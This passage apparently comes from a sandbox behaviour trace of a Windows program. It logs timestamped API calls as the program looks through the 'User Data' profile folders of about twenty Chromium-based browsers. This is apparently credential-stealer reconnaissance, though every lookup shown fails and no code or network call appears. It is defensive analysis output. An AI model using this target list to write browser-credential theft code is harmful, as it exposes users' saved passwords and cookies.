lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x41 [0281.757] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.757] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.758] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.758] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data") returned 0x33 [0281.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.758] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x32 [0281.758] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.760] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.760] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x37 [0281.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.760] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x36 [0281.760] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.762] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.762] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data") returned 0x37 [0281.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.762] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x36 [0281.762] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.782] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.782] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data") returned 0x32 [0281.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.782] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x31 [0281.783] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.784] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.784] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data") returned 0x33 [0281.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.785] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x32 [0281.785] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.787] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.787] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data") returned 0x32 [0281.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.787] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x31 [0281.787] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.788] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.789] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data") returned 0x3c [0281.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.789] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3b [0281.789] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.791] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.791] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x40 [0281.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.791] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3f [0281.791] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.792] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.793] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3a [0281.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.793] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x39 [0281.793] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.795] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.795] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x55 [0281.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.795] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x54 [0281.796] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.797] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.797] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x40 [0281.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.797] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3f [0281.798] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.799] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.799] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x39 [0281.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.799] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x38 [0281.800] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.801] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.801] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data") returned 0x32 [0281.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.801] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x31 [0281.801] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.803] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.803] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data") returned 0x34 [0281.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.803] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x33 [0281.803] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.805] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.805] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data") returned 0x33 [0281.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.805] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x32 [0281.805] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.807] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.807] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x39 [0281.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.807] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x38 [0281.807] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.809] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.809] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data") returned 0x36 [0281.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.809] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x35 [0281.809] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.811] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.811] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data") returned 0x31 [0281.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.812] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data", lpFilePart=0x0) returned 0x30 [0281.812] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data\\*", lpFindFileData=0x43e800 | out: 